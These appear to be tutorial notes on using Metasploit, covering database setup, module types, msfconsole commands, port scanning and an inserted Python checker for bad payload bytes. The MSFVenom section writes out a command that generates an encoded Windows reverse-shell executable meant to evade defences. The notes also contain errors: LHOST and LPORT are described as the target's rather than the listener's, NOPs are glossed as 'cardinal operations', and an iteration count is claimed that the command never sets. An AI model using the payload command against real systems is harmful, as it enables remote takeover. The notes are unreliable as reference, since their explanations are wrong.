Metasploit
The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.
Setting up database
The database in Metasploit is used to store output. Postgres comes pre-installed on Kali. The commands for the database are:
msfdb init - Start and initialize the database
msfdb reinit - Delete and reinitialize the database
msfdb delete - Delete the database and stop using it
msfdb start - Start the database
msfdb stop - Stop the database
msfdb status - Check service status
msfdb run - Start the database and run msfconsole
For now, to start the database we want to reinit, so all data is deleted and the database is restarted.
Afterwards, run msfconsole so we can check the status of the database.
Modules
Metasploit comes with many modules pre-installed. The modules are categorized under:
Auxiliary - Contains alternate exploits and enumeration scripts
Encoders - Contains encoders that assist in encoding payloads
Evasion - Contains scripts that help evade defender software
Exploits - Organized into folders based on device, then exploit.
NOPS - Cardinal operations
Payloads - Categorized into Singles, Stagers, and Stages
Post - Post exploitation modules
MSF Venom
MSFVenom is a Metasploit standalone payload generator. You can use MSFVenom on its own to specify a framework, encoder, executable format, etc. to be used.
To generate a payload with the msfvenom command (the values for LHOST and LPORT are placeholders here):
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> -a x86 -f exe -b "\x00" -e x86/shikata_ga_nai > payload.exe
Let's break down what's going on in the command:
msfvenom: Calling the msfvenom generator
-p windows/shell_reverse_tcp: -p is the payload flag, and the string is the payload name
LHOST: The host IP of the target system.
LPORT: The specified port of the target system. Default is 4444.
-a x86: Architecture specification.
-f exe: Format of the payload. In this case a .exe executable.
-b "\x00": The bad characters the payload must not contain; here the null byte (\x00).
-e x86/shikata_ga_nai: The encoder.
> payload.exe: The output file name for the payload.
Encoders
The encoder can be run multiple times on the same payload using the -i <iteration number> option. This runs the payload through 3 iterations of the encoder, increasing its size but also its encoding strength.
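The -b flag above promises that the generated bytes contain none of the listed bad characters, and each extra -i iteration changes those bytes again. The following is an added example, not part of these notes or of Metasploit itself: it parses an msfvenom-style bad-character list and scans a byte blob for violations, so the output of any encoder run can be checked before it is used. The sample blobs are constructed and are not real payloads.

```python
import re


def parse_badchar_spec(spec: str) -> bytes:
    """Parse an msfvenom-style bad-character list such as r'\x00\x0a\x0d'
    into raw bytes. Only the \\xHH form is accepted; anything else is an error."""
    tokens = re.findall(r"\\x([0-9a-fA-F]{2})", spec)
    # Every token is exactly 4 characters, so the total length must match.
    if not tokens or len(tokens) * 4 != len(spec):
        raise ValueError(f"malformed bad-character spec: {spec!r}")
    return bytes(int(t, 16) for t in tokens)


def find_bad_chars(blob: bytes, badchars: bytes) -> list:
    """Return (offset, byte_value) pairs for every bad character in blob."""
    bad = set(badchars)
    return [(i, b) for i, b in enumerate(blob) if b in bad]


def check_payload(blob: bytes, spec: str) -> dict:
    """Summarise a check: size, hit count and the offending offsets."""
    hits = find_bad_chars(blob, parse_badchar_spec(spec))
    return {"size": len(blob), "clean": not hits, "hits": hits}


# Constructed sample bytes for demonstration only (not shellcode).
SAMPLE_WITH_NULLS = b"\x31\xc0\x50\x68\x00\x0a\x41\x42\x00"
SAMPLE_CLEAN = b"\x31\xc0\x50\x68\x41\x42\x43\x44"

if __name__ == "__main__":
    for name, blob in (("with_nulls", SAMPLE_WITH_NULLS), ("clean", SAMPLE_CLEAN)):
        result = check_payload(blob, r"\x00\x0a")
        print(name, result)
        for offset, value in result["hits"]:
            print(f"  bad byte 0x{value:02x} at offset {offset}")
```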
MSFCONSOLE
Searching
You can use the extensive search queries in msfconsole to find whatever you're looking for. The search command looks like: search <string> type:exploit
Use
When you find a program you'd like to utilize, you can run the use command to load the program: use <program name>
While inside an exploit you can use the show options command to determine what configuration needs to be set up.
Set
While an exploit is loaded you can use the set <option> <value> command to set the configuration options.
Unset
The reverse of Set. To unload a config value use the unset <option> command.
Run
To run the exploit use the run command.
Sessions
Use the sessions -l command to view any active sessions.
Back
To back out of using an exploit, type the back command to be brought back to the menu.
Port Scanning
Port scanning through msfconsole is very similar to running the nmap tool.
The difference is the results are stored in the database and commands can be run to retrieve specific results.
You can find alternative port scanners for specific scans by using: search portscan